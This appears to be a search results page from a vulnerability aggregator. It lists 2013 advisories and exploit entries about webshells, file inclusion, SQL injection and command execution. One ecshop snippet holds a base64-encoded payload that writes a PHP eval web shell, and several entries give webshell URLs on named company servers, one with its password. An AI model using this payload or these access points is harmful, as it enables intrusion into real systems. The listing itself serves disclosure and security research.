
2126 matches found

securityvulns
added 2013/07/15 12:00 a.m., 43 views

File Lite 3.3 & 3.5 PRO iOS - Multiple Web Vulnerabilities

====== File Lite 3.3 & 3.5 PRO iOS - Multiple Web Vulnerabilities Date: ===== 2013-05-04 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=939 VL-ID: ===== 939 Common Vulnerability Scoring System: ==================================== 5.9 Introduction: ============= You ha...

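Exploits: 0
seebug.org
added 2013/07/08 12:00 a.m., 57 views

Yonyou software development management platform: IIS write permission allows obtaining a server webshell

Brief description: see details. Detailed description: http://ufsdp-borrow.ufsoft.com.cn/cmd.asp http://ufsdp-borrow.ufsoft.com.cn/1937cN.txt Proof of vulnerability:...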

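7.1 AI score
Exploits: 0
seebug.org
added 2013/07/08 12:00 a.m., 17 views

Yonyou Chanjet Service Alliance 4S store had a webshell uploaded (the shell has a weak password)

Brief description: see details. Detailed description: Official website of the Yonyou Chanjet Service Alliance 4S store (Qitong Service). During testing an aspx trojan was found; a weak password gets straight in. http://www.uftong.com/Admin/ManagerTestimony/ftb.image.aspx password admin --! Proof of vulnerability:...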

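7.1 AI score
Exploits: 0
seebug.org
added 2013/07/08 12:00 a.m., 17 views

Yonyou R&D practice sharing platform: directory traversal vulnerability reveals an existing webshell (IIS parsing vulnerability)

Brief description: see details. Detailed description: http://ufsdp-zjsj.ufida.com.cn/index.aspx Traversal vulnerability address: http://ufsdp-zjsj.ufida.com.cn/files/ On this page I found traces left by a predecessor; following the trail, I found one of the trojans the predecessor had uploaded via Fck that was not fully parsed, and obtained the one-liner password as Using the path the predecessor had paved, connected directly with Chopper: http://ufsdp-zjsj.ufida.com.cn/files/s.asp;.jpg Proof of vulnerability:...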

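7.1 AI score
Exploits: 0
seebug.org
added 2013/07/01 12:00 a.m., 23 views

Yonyou software: IIS write permission (PUT) allows obtaining a webshell and controlling the server

Brief description: A year later, Yonyou is hit again. I'm just a newbie who only knows PUT, so the god-tier bosses among the WooYun crowd please don't flame me, just move along! I heard you can now redeem QB, and I'm mainly here for the QB. That's about all a broke nobody aspires to. Detailed description: http://summit.ufida.com/ Tested once in August 2012 and it was present; now it's back again, heh. PUT, you all know! WooYun: Yonyou subsite vulnerability exploited for intrusion. Why does the vulnerability still exist? Proof of vulnerability:...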

7.1 AI score
Exploits: 0
myhack58
added 2013/06/14 12:00 a.m., 34 views

One dedecms variable coverage holes of the wretched use of the method-vulnerability warning-the black bar safety net

The most recent dedecms variable coverage holes, and finally can control the global variables, but can not completely control $GLOBALS$v1 .= $v2; Note that there is a sliding scale, is in an initialized global variable content on a sliding scale the content. It has now been disclosed the exploit...

0.2 AI score
Exploits: 0
myhack58
added 2013/06/13 12:00 a.m., 17 views

PHP file include vulnerability attack and Defense combat-vulnerability warning-the black bar safety net

Summary PHP is a very popular Web development language on the Internet many Web applications are using PHP development. And in the use of PHP development of Web applications, PHP file include vulnerability is a Common Vulnerability. The use of PHP file include vulnerabilities intrusion website is...

0.9 AI score
Exploits: 0
myhack58
added 2013/06/03 12:00 a.m., 37 views

php LFI to read the php file source code as well as directly post webshell-vulnerability warning-the black bar safety net

Recently in the busy defcon topic training where a set of topics where there is a foreigner to write it is mentioned in the LFI, another tips The original text please refer to the PS: the skill is not a new technology bull God has certainly been with got bored, so when passing on the line =,= I...

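7.5 AI score
Exploits: 0
seebug.org
added 2013/05/30 12:00 a.m., 25 views

The latest ecshop patch contains a webshell; site administrators, please take note!

Brief description: The latest ecshop patch (May 6, 2013) contains a backdoor; site administrators, please take note! Patch address: http://bbs.ecshop.com/viewthread.php?tid=1129622 If you downloaded it, please deal with it promptly. I also hope the vendor will notify users via an announcement! Detailed description: The vendor has already stopped offering the patch for download. I downloaded the patch from a third party, ecmoban.com. At first I thought the third party had deliberately written the backdoor, so I contacted ecmoban staff. It was confirmed to be caused by the ec forum being compromised with injected malicious code. Shell location...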

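7.1 AI score
Exploits: 0
seebug.org
added 2013/05/29 12:00 a.m., 16 views

Getting a webshell via the ecshop admin backend

Brief description: Getting a webshell via the ecshop admin backend. Detailed description: Template management -- language item editing, e.g. user.php. Search for: 状态 (status). Insert $$fputsfopenbase64decodeZnVjay5waHA,w,base64decodePD9waHAgZXZhbCgkX1BPU1RbZnVja10pPz4 Visit http://localhost/ecshop/languages/zhcn/user.php One-liner: http://localhost/ecshop/languages/zhcn/fuck.php Proof of vulnerability:...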

7.1 AI score
Exploits: 0
Kitploit
added 2013/05/23 8:55 p.m., 15 views

[jSQL Injection v0.4] Java tool for automatic database injection

jSQL Injection is a lightweight application used to find database information from a distant server. jSQL is free, open source and cross-platform Windows, Linux, Mac OS X, Solaris. Version 0.4 features: GET, POST, header, cookie methods Normal, error based, blind, time based algorithms Automatic...

7.6 AI score
Exploits: 0
myhack58
added 2013/05/18 12:00 a.m., 16 views

Meng Jie home textile jboss configuration improper has been invaded many times-the vulnerability and early warning-the black bar safety net

Estimated you also have seen, just haven't submitted. Supposedly now is a positive card manufacturers, the author fixes it. Detailed description: Information leak: http://amb.mendale.com.cn/status?full=true From the figure we can see that in my screenshot, still someone in to access the...

Exploits: 0
exploitpack
added 2013/05/13 12:00 a.m., 14 views

Wifi Photo Transfer 2.11.1 PRO - Multiple Vulnerabilities

Wifi Photo Transfer 2.11.1 PRO - Multiple Vulnerabilities Title: ====== Wifi Photo Transfer 2.1 & 1.1 PRO - Multiple Vulnerabilities Date: ===== 2013-04-21 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=932 VL-ID: ===== 932 Common Vulnerability Scoring System:...

0.4 AI score
Exploits: 0
myhack58
added 2013/05/13 12:00 a.m., 37 views

cmseasy{easy through CMS}v5.5 arbitrary file upload vulnerability in the simple analysis of reference using the method-vulnerability warning-the black bar safety net

Yesterday found someone storm out of a cmseasy v5.5 arbitrary file upload vulnerability, it also comes with the exp. Exploit the vulnerability can directly Upload a webshell and other malicious files, the harm is huge and currently the official has not been any patches here to do some simple...

7.3 AI score
Exploits: 0
Exploit DB
added 2013/05/13 12:00 a.m., 24 views

File Lite 3.3/3.5 PRO iOS - Multiple Vulnerabilities

Title: ====== File Lite 3.3 & 3.5 PRO iOS - Multiple Web Vulnerabilities Date: ===== 2013-05-04 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=939 VL-ID: ===== 939 Common Vulnerability Scoring System: ==================================== 5.9 Introduction: =============...

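7.4 AI score
Exploits: 0
seebug.org
added 2013/05/11 12:00 a.m., 13 views

Kingdee website allows arbitrary command execution with root privileges

Brief description: The Kingdee website allows arbitrary command execution with root privileges. Detailed description: The user login page of the Kingdee website, http://id.kingdee.com/, has a command execution vulnerability. Using the struts2 private variable class.classLoader.jarPath, arbitrary commands can be executed (with root privileges), and a webshell could very likely be obtained (of course, I did not attempt to obtain one), which in turn could threaten the security of user data. Because arbitrary commands run with root privileges, full control of the server can be obtained, and the server could be used as a springboard to threaten the security of other nearby servers. Proof of vulnerability: Visit the following link with the IE browser:...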

7.1 AI score
Exploits: 0
exploitpack
added 2013/05/08 12:00 a.m., 36 views

MoinMoin - Arbitrary Command Execution

MoinMoin - Arbitrary Command Execution !/usr/bin/env python -- coding: utf-8 -- ascii = '\x1b1;31m' ascii +=' \r\n' ascii +=' ██████████ ██████ ███ ███ ███ ██████████ ████████ ███ ███████ \r\n' ascii +=' ███████████ ████████ ███ ████ ███ ███████████ ████████ ███ ███████ \r\n' ascii +=' ██▒ ██▒ ██...

0.3 AI score
Exploits: 0
Exploit DB
added 2013/05/08 12:00 a.m., 72 views

MoinMoin - Arbitrary Command Execution

!/usr/bin/env python -- coding: utf-8 -- ascii = '\x1b1;31m' ascii +=' \r\n' ascii +=' ██████████ ██████ ███ ███ ███ ██████████ ████████ ███ ███████ \r\n' ascii +=' ███████████ ████████ ███ ████ ███ ███████████ ████████ ███ ███████ \r\n' ascii +=' ██▒ ██▒ ██▒ ██▒ ███ ██▒ ██▒█▒███ ██▒ ██▒ ██▒ ██▒...

7.4 AI score
Exploits: 0
Vulnerability Lab
added 2013/05/04 12:00 a.m., 15 views

File Lite 3.3 & 3.5 PRO iOS - Multiple Web Vulnerabilities

Document Title: =============== File Lite 3.3 & 3.5 PRO iOS - Multiple Web Vulnerabilities References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=939 Release Date: ============= 2013-05-04 Vulnerability Laboratory ID VL-ID: ====================================...

0.4 AI score
Exploits: 0
Exploit DB
added 2013/04/25 12:00 a.m., 44 views

Hornbill Supportworks ITSM 1.0.0 - SQL Injection

Summary SQL Injection Vulnerability in ITSM component of Hornbill Supportworks Application CVE number: CVE-2013-2594 Impact: High Vendor homepage: http://www.hornbill.com Vendor notified: 19/11/2012 Vendor response: This issue has reportedly been fixed but the vendor refused to give version...

7.5 CVSS, 6.5 AI score, 0.02638 EPSS
Exploits: 6